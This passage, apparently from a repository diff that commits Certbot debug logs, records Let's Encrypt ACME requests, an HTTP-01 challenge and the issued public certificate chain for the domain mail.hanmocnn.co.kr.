"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnZIZW5yOVdSZ1NZS2VkN3g4NjhzbkdHZ1RlcWtfQnNxVHFZM0xuRzhxN2MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzODU4YTQ4NWMwMzMwMjUwZDZkZTcxMmMzMjlmZjI2ZmI1LzEifQ",
|
||||||
|
"signature": "X591XvnI02Agc3dUrxh3hTWlQ9gCVRZHBEs_5TIIqzRqx8dyj71RKnji0CdkxPE4JpPcAkJaixeiQau1uTqSpHs6ixfDPPrfDzNcLJlkyOXBdipNCuDD63tV3OPlcYEDdQXgUHQfikEjwWum2tHSzhvRX1szGkyq0UUGu_RM7JrrGe5e1l0wYhr_5c12dj0gA7V6L3sRTIHb9UpcO8p9_fszUSz5I7MZpP0grjXzqHiH9x5K2h_EQ8LvtPKe9CO85eX1ZufvZj-Np1cEyQOoNQf5dqxbXhNnwBMzAiJEv-XJvlqpGm-00pVcpSvTQqED_P0e2i3NhYPQZb91idGo9A",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:38,624:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063858a485c0330250d6de712c329ff26fb5/1 HTTP/1.1" 200 2328
|
||||||
|
2026-02-14 23:36:38,625:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:38 GMT
|
||||||
|
Content-Type: application/pem-certificate-chain
|
||||||
|
Content-Length: 2328
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5/0>;rel="alternate"
|
||||||
|
Replay-Nonce: qLPTsdtfmv85WZpKILu_umBFIIsvcuyW1Y0hi5WT9olFTo9SIAY
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIDpTCCAyugAwIBAgISBjhYpIXAMwJQ1t5xLDKf8m+1MAoGCCqGSM49BAMDMDIx
|
||||||
|
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
|
||||||
|
ODAeFw0yNjAyMTQyMjM4MDJaFw0yNjA1MTUyMjM4MDFaMB4xHDAaBgNVBAMTE21h
|
||||||
|
aWwuaGFubW9jbm4uY28ua3IwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQ8pxPxcuij
|
||||||
|
XHBLTYsSPTSgU3zzIJjQ7xX9OR3/Q+05yfLFv7J0T8oCgHYmmZE2dHG0DXtSp7Vm
|
||||||
|
EUD96FdhTdmB2IMLMfUrzM5lQYo6chamxbnRnXvEH3Khs+82VRZz+QqjggIWMIIC
|
||||||
|
EjAOBgNVHQ8BAf8EBAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/
|
||||||
|
BAIwADAdBgNVHQ4EFgQU5Yj9WqUvf/9B0wtxhkCGx9UUkvgwHwYDVR0jBBgwFoAU
|
||||||
|
jw0TovYuftFQbDMYOF1ZjiNykcowMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzAC
|
||||||
|
hhZodHRwOi8vZTguaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE21haWwuaGFubW9j
|
||||||
|
bm4uY28ua3IwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAioCCgHoYc
|
||||||
|
aHR0cDovL2U4LmMubGVuY3Iub3JnLzU0LmNybDCCAQMGCisGAQQB1nkCBAIEgfQE
|
||||||
|
gfEA7wB1AJaXZL9VWJet90OHaDcIQnfp8DrV9qTzNm5GpD8PyqnGAAABnF6DWw8A
|
||||||
|
AAQDAEYwRAIgFec+y9jrM6c9Lf3vNDFYxydQLd2FfYCWPsTKF7uKHKgCIEz1X+xq
|
||||||
|
LnqvKjoLhm/BC0lTehEdcDEoHAtcHbr9XubUAHYAZBHEbKQS7KeJHKICLgC8q08o
|
||||||
|
B9QeNSer6v7VA8l9zfAAAAGcXoNqZgAABAMARzBFAiBypKO0gNsH/Fqd4jK8Z9YJ
|
||||||
|
5gWAE+eEoxhkeKF9n1GF2AIhAMlIUgwLKtsj2UdZ6qWWp0Ew6L0mMg8E72tV0rn2
|
||||||
|
TuYyMAoGCCqGSM49BAMDA2gAMGUCMDPRlyHa6dwh8HioZ/du2eihye/hY9f3zuEU
|
||||||
|
1YDjNsVO3yMkkr0MgFkBzbFO/lQDeAIxAKQ36q4cNqNwYrOd2gsuXczOpUEAeoUJ
|
||||||
|
A0miZddVRI/uTm5o0sYlEABAQ5jE3I56Gw==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw
|
||||||
|
CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg
|
||||||
|
R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y
|
||||||
|
NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy
|
||||||
|
eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM
|
||||||
|
ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET
|
||||||
|
oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO
|
||||||
|
BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG
|
||||||
|
A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK
|
||||||
|
MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw
|
||||||
|
JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK
|
||||||
|
MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v
|
||||||
|
cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls
|
||||||
|
5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4
|
||||||
|
4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
2026-02-14 23:36:38,625:DEBUG:acme.client:Storing nonce: qLPTsdtfmv85WZpKILu_umBFIIsvcuyW1Y0hi5WT9olFTo9SIAY
|
||||||
|
2026-02-14 23:36:38,626:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager
|
||||||
|
2026-02-14 23:36:38,627:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-4.
|
||||||
|
2026-02-14 23:36:38,627:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-4.
|
||||||
|
2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-4/cert.pem.
|
||||||
|
2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-4/privkey.pem.
|
||||||
|
2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-4/chain.pem.
|
||||||
|
2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-4/fullchain.pem.
|
||||||
|
2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-4/README.
|
||||||
|
2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user).
|
||||||
|
2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user).
|
||||||
|
2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user).
|
||||||
|
2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user).
|
||||||
|
2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user).
|
||||||
|
2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user).
|
||||||
|
2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user).
|
||||||
|
2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user).
|
||||||
|
2026-02-14 23:36:38,640:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-14 23:36:38,640:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
|
||||||
|
2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var webroot_map={'mail.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user).
|
||||||
|
2026-02-14 23:36:38,642:DEBUG:certbot._internal.display.obj:Notifying user:
|
||||||
|
Successfully received certificate.
|
||||||
|
Certificate is saved at: /etc/letsencrypt/live/npm-4/fullchain.pem
|
||||||
|
Key is saved at: /etc/letsencrypt/live/npm-4/privkey.pem
|
||||||
|
This certificate expires on 2026-05-15.
|
||||||
|
These files will be updated when the certificate renews.
|
||||||
|
2026-02-14 23:36:38,642:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS:
|
||||||
|
2026-02-14 23:36:38,643:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions.
|
||||||
|
2026-02-14 23:36:38,646:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by:
|
||||||
|
* Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
|
||||||
|
* Donating to EFF: https://eff.org/donate-le
|
||||||
361
npm/data/logs/letsencrypt.log.4
Normal file
361
npm/data/logs/letsencrypt.log.4
Normal file
@@ -0,0 +1,361 @@
|
|||||||
|
2026-02-14 23:30:10,216:DEBUG:certbot._internal.main:certbot version: 5.3.0
|
||||||
|
2026-02-14 23:30:10,217:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
|
||||||
|
2026-02-14 23:30:10,217:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-3', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'mail.hanmocnn.co.kr']
|
||||||
|
2026-02-14 23:30:10,217:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
|
||||||
|
2026-02-14 23:30:10,231:DEBUG:certbot._internal.log:Root logging level set at 30
|
||||||
|
2026-02-14 23:30:10,232:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-14 23:30:10,232:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
|
||||||
|
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
|
||||||
|
Interfaces: Authenticator, Plugin
|
||||||
|
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
|
||||||
|
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffffaf0747d0>
|
||||||
|
Prep: True
|
||||||
|
2026-02-14 23:30:10,233:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffffaf0747d0> and installer None
|
||||||
|
2026-02-14 23:30:10,233:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
|
||||||
|
2026-02-14 23:30:10,466:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
|
||||||
|
2026-02-14 23:30:10,467:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
|
||||||
|
2026-02-14 23:30:10,469:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
|
||||||
|
2026-02-14 23:30:11,033:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
|
||||||
|
2026-02-14 23:30:11,033:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:30:10 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 1033
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"IeJ13iSSbJU": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
|
||||||
|
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
|
||||||
|
"meta": {
|
||||||
|
"caaIdentities": [
|
||||||
|
"letsencrypt.org"
|
||||||
|
],
|
||||||
|
"profiles": {
|
||||||
|
"classic": "https://letsencrypt.org/docs/profiles#classic",
|
||||||
|
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
|
||||||
|
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
|
||||||
|
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
|
||||||
|
},
|
||||||
|
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
|
||||||
|
"website": "https://letsencrypt.org"
|
||||||
|
},
|
||||||
|
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
|
||||||
|
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
|
||||||
|
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
|
||||||
|
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
|
||||||
|
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
|
||||||
|
}
|
||||||
|
2026-02-14 23:30:11,035:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for mail.hanmocnn.co.kr
|
||||||
|
2026-02-14 23:30:11,039:DEBUG:acme.client:Requesting fresh nonce
|
||||||
|
2026-02-14 23:30:11,039:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
|
||||||
|
2026-02-14 23:30:11,211:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
|
||||||
|
2026-02-14 23:30:11,212:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:30:11 GMT
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: QkEzerAfwLnIKGWlrRhhVfFAZpsV16w9Uf3Rz5_svuQFLXZkr1c
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
|
||||||
|
2026-02-14 23:30:11,212:DEBUG:acme.client:Storing nonce: QkEzerAfwLnIKGWlrRhhVfFAZpsV16w9Uf3Rz5_svuQFLXZkr1c
|
||||||
|
2026-02-14 23:30:11,212:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "mail.hanmocnn.co.kr"\n }\n ]\n}'
|
||||||
|
2026-02-14 23:30:11,218:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZndMbklLR1dsclJoaFZmRkFacHNWMTZ3OVVmM1J6NV9zdnVRRkxYWmtyMWMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
|
||||||
|
"signature": "hUNh8dxNA5BF8icGPOEHmCPfJtyawCVJzqBeUIeEzsqfaKt8EjEL3baKo7zfOirYzp4cx4fwycJJpLYufSd76FU5VIC4kh97NG_pSWbIyn80j9NuXk5HwNLVE4iKRkI7_pP-IOcnoy69XJm8InQbyLJOHu63pbQ8lQBYi30aPXXswlYRv_ow-qXKI8MeA3kw6eImqd2c77ZqL-ixnJNxHOQGqAbaxy3RYiwdM9PI9_duw8DHOD7poKQNf0gHP2TZJ8rx3GL5tNZFi748tENlGKtQDHgYgv-80hLu5h1Ij7UjCKBIgUmyAtnETmPnoLSSIYGg26_v2gHgBKyB09R2EQ",
|
||||||
|
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm1haWwuaGFubW9jbm4uY28ua3IiCiAgICB9CiAgXQp9"
|
||||||
|
}
|
||||||
|
2026-02-14 23:30:11,498:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 353
|
||||||
|
2026-02-14 23:30:11,499:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 201
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:30:11 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 353
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480369106906
|
||||||
|
Replay-Nonce: QkEzerAf_AMAs5rp4OhuwCMv__bv8YNGZsyN5ulZLrYp-QHuOV8
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:30:11Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480369106906"
|
||||||
|
}
|
||||||
|
2026-02-14 23:30:11,500:DEBUG:acme.client:Storing nonce: QkEzerAf_AMAs5rp4OhuwCMv__bv8YNGZsyN5ulZLrYp-QHuOV8
|
||||||
|
2026-02-14 23:30:11,500:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:30:11,505:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZl9BTUFzNXJwNE9odXdDTXZfX2J2OFlOR1pzeU41dWxaTHJZcC1RSHVPVjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzgyODA0MDk2In0",
|
||||||
|
"signature": "u7GAisVQzkIqT5g7zSAC1_FkoVVmScpwW6Q12gDpSPi9lgnK7kq_MxapWY1FvmjQmW9piUvgi8DFfP8VcPARI-L9RpYhe8znFu_4Tw0Y_Erlqt5WrlYTg8_78Af64hbrqcvL3wlgtENkSeWP-Gj7vFAwnw_auW2ZEAWvMbRIkN49BgScBAtP7Du8ivqPmKhSaL3FJPjGFpUbqLM1i2n8LvMTsi5d4wkHP3QjV28owu3Js2X7ueG_wcYA0I1kM_-LCwhd6iiAd2qmtDM67zUS_Bcy_M0jrlQk0nMW8taxle80hGYHKb7gYVVmpastOSmnVIKtbOiqG10TGNp9T-Qr3Q",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:30:11,692:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658782804096 HTTP/1.1" 200 827
|
||||||
|
2026-02-14 23:30:11,693:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:30:11 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 827
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: QkEzerAfdangirSe2YPrGQijk5nJQFNXPlGCS3W1xymb8N4x3mM
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:30:11Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/Xat64Q",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:30:11,693:DEBUG:acme.client:Storing nonce: QkEzerAfdangirSe2YPrGQijk5nJQFNXPlGCS3W1xymb8N4x3mM
|
||||||
|
2026-02-14 23:30:11,694:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg', 'status': 'pending', 'token': 'RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA'}
|
||||||
|
2026-02-14 23:30:11,694:INFO:certbot._internal.auth_handler:Performing the following challenges:
|
||||||
|
2026-02-14 23:30:11,694:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='mail.hanmocnn.co.kr')
|
||||||
|
2026-02-14 23:30:11,695:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
|
||||||
|
2026-02-14 23:30:11,695:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
|
||||||
|
2026-02-14 23:30:11,696:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA
|
||||||
|
2026-02-14 23:30:11,697:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{}'
|
||||||
|
2026-02-14 23:30:11,701:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZmRhbmdpclNlMllQckdRaWprNW5KUUZOWFBsR0NTM1cxeHltYjhONHgzbU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzgyODA0MDk2L1ZILUx1USJ9",
|
||||||
|
"signature": "UI4HqG8aIkUIiLRWJtRIc8wDV009hQbsVzlB8xw5-6f5Z1hniXCcTAxR1g--rstxXvbUc8JwKKzP5a1P9KqrFPQqkU8tcMgMAQdLnouHVJ4WqlF4gbT1Oho55kFYktJcknxwXtH1Na8oRdrMl58cPuZV46gCiCjA5jQyVLuaAo7UHFK23npRg4vUSsuJXmzEXiE_ak0K9LauVMSqOy8D5ccG8dxYYVUl3CwQ8JzTnUkk0oMBjX_twlf8tmWNxfqadc-xGyEQZPoykNJfZtoL_1pT40QGohUB5Bvd5fLlAwt9LMN8FhpqLh4axSdH0sXNrDtJDqVTPdABojASfUg5FQ",
|
||||||
|
"payload": "e30"
|
||||||
|
}
|
||||||
|
2026-02-14 23:30:11,879:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658782804096/VH-LuQ HTTP/1.1" 200 195
|
||||||
|
2026-02-14 23:30:11,880:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:30:11 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 195
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096>;rel="up"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ
|
||||||
|
Replay-Nonce: QkEzerAfwS0GHOuh0p5oZ0dX2-h1cdvkUmzcj3UERL2eyB6TIs0
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
|
||||||
|
}
|
||||||
|
2026-02-14 23:30:11,880:DEBUG:acme.client:Storing nonce: QkEzerAfwS0GHOuh0p5oZ0dX2-h1cdvkUmzcj3UERL2eyB6TIs0
|
||||||
|
2026-02-14 23:30:11,880:INFO:certbot._internal.auth_handler:Waiting for verification...
|
||||||
|
2026-02-14 23:30:12,881:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:30:12,886:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096:
|
||||||
|
{
|
